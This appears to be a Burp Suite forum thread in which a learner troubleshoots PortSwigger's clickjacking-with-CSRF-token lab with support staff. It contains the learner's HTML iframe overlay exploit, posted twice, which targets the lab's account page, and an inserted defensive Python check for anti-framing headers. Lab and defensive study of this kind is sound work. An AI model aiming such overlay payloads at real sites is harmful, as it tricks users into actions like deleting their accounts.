Burp Suite User Forum


Possible error in 'Lab: Basic clickjacking with CSRF token protection'

akibaRubi | Last updated: Jul 24, 2024 05:44PM UTC

Despite inputting the URL of the account page with the dangerous delete button, the login page is displayed in the exploit server instead of the page containing the dangerous delete button.

Ben, PortSwigger Agent | Last updated: Jul 25, 2024 05:56AM UTC

Hi, are you using the embedded browser when you attempt this lab? If so, does using a standard version of Chrome allow you to complete the lab successfully?

akibaRubi | Last updated: Jul 25, 2024 11:54AM UTC

I used the embedded browser. I also tried it with Chrome.

Ben, PortSwigger Agent | Last updated: Jul 25, 2024 11:58AM UTC

Hi, the embedded browser will no longer work with this subset of labs; as far as we were aware, using a normal version of Chrome should still work, however. Are you able to provide us with details of the exploit you are using and what you see when you use the "view exploit" functionality?

akibaRubi | Last updated: Jul 25, 2024 01:57PM UTC

Below is the exploit:

<style>
  iframe {
    position: relative;
    width: 500px;
    height: 700px;
    opacity: 1;
    z-index: 2;
  }
  div {
    position: absolute;
    top: 300px;
    left: 60px;
    z-index: 1;
  }
</style>
<div>Test me</div>
<iframe src="https://0a8f0036047ee3be880f4caf007a0037.web-security-academy.net/my-account?id=wiener"></iframe>
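
The overlay above only works because the lab's account page can be embedded by a foreign origin at all. As an added example (editor's code, not from this thread or from PortSwigger), the check below evaluates a response's anti-framing headers the way a defender would when triaging clickjacking exposure: a CSP frame-ancestors directive, if present, takes precedence over X-Frame-Options, and an absent or obsolete (ALLOW-FROM) setting leaves the page frameable. The header sets in demo() are constructed for illustration.

```python
# Added example: decide whether a page served with the given response headers
# can be embedded by an attacker-controlled origin (the clickjacking precondition).
from typing import List, Mapping, Optional


def csp_frame_ancestors(csp: str) -> Optional[List[str]]:
    """Return the source list of the frame-ancestors directive, or None if absent."""
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            # Strip the quotes around keywords such as 'self' and 'none'.
            return [p.strip("'").lower() for p in parts[1:]]
    return None


def is_frameable_cross_origin(headers: Mapping[str, str]) -> bool:
    """True if a foreign page could place this response in an <iframe>."""
    h = {k.lower(): v for k, v in headers.items()}

    # Modern browsers honour CSP frame-ancestors over X-Frame-Options.
    csp = h.get("content-security-policy")
    if csp is not None:
        ancestors = csp_frame_ancestors(csp)
        if ancestors is not None:
            # 'none', 'self' or an explicit origin list all exclude an arbitrary
            # attacker origin; only a wildcard or scheme-only source leaves it open.
            return any(a in ("*", "https:", "http:") for a in ancestors)

    xfo = h.get("x-frame-options", "").strip().lower()
    if xfo in ("deny", "sameorigin"):
        return False
    # Missing header, or the obsolete ALLOW-FROM form that browsers ignore.
    return True


def demo() -> dict:
    """Constructed header sets (not captured from the lab) and their verdicts."""
    samples = {
        "no protection": {},
        "xfo deny": {"X-Frame-Options": "DENY"},
        "csp none": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'"},
        "csp wildcard overrides xfo": {
            "Content-Security-Policy": "frame-ancestors *",
            "X-Frame-Options": "DENY",
        },
    }
    return {name: is_frameable_cross_origin(hdrs) for name, hdrs in samples.items()}


if __name__ == "__main__":
    for name, frameable in demo().items():
        print(f"{name}: {'FRAMEABLE' if frameable else 'protected'}")
```

The mitigation that makes the lab's overlay impossible is the same one the check looks for: serve the account page with Content-Security-Policy: frame-ancestors 'self' (or 'none'), with X-Frame-Options: DENY as a fallback for older browsers.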

akibaRubi | Last updated: Jul 25, 2024 02:03PM UTC

What I see is the login page for entering a username and password, with the login button.

Ben, PortSwigger Agent | Last updated: Jul 26, 2024 06:54AM UTC

Hi, if you remove the id parameter from your exploit, does this then work for you (if you also use a standard version of Chrome)? So rather than:

<iframe src="https://0a8f0036047ee3be880f4caf007a0037.web-security-academy.net/my-account?id=wiener"></iframe>

use:

<iframe src="https://0a8f0036047ee3be880f4caf007a0037.web-security-academy.net/my-account"></iframe>

akibaRubi | Last updated: Jul 26, 2024 07:40PM UTC

<style>
  iframe {
    position: relative;
    width: 500px;
    height: 700px;
    opacity: 1;
    z-index: 2;
  }
  div {
    position: absolute;
    top: 300px;
    left: 60px;
    z-index: 1;
  }
</style>
<div>Test me</div>
<iframe src="https://0a7200fe0324b93982815bf400060091.web-security-academy.net/my-account"></iframe>

akibaRubi | Last updated: Jul 26, 2024 07:58PM UTC

It is still showing the login page in the exploit server.

Ben, PortSwigger Agent | Last updated: Jul 26, 2024 08:02PM UTC

Hi, are you also using a normal version of Chrome when you deliver this exploit (not the embedded browser)?

akibaRubi | Last updated: Jul 28, 2024 02:13PM UTC

I tried it on both Chrome and the embedded browser.

Ben, PortSwigger Agent | Last updated: Jul 28, 2024 03:38PM UTC

Hi, are you able to email us at support@portswigger.net and include some screenshots (or a screen recording) of the steps that you are taking in your Chrome browser, so that we can see exactly what is happening?

akibaRubi | Last updated: Jul 30, 2024 07:31PM UTC

Email with screen recording sent.

Dominyque, PortSwigger Agent | Last updated: Jul 31, 2024 10:53AM UTC

Hi akibaRubi, we have received your email, thank you.

akibaRubi | Last updated: Aug 03, 2024 11:52AM UTC

Okay, lab solved. Thanks.

Michelle, PortSwigger Agent | Last updated: Aug 05, 2024 07:57AM UTC

Thanks for the update :)
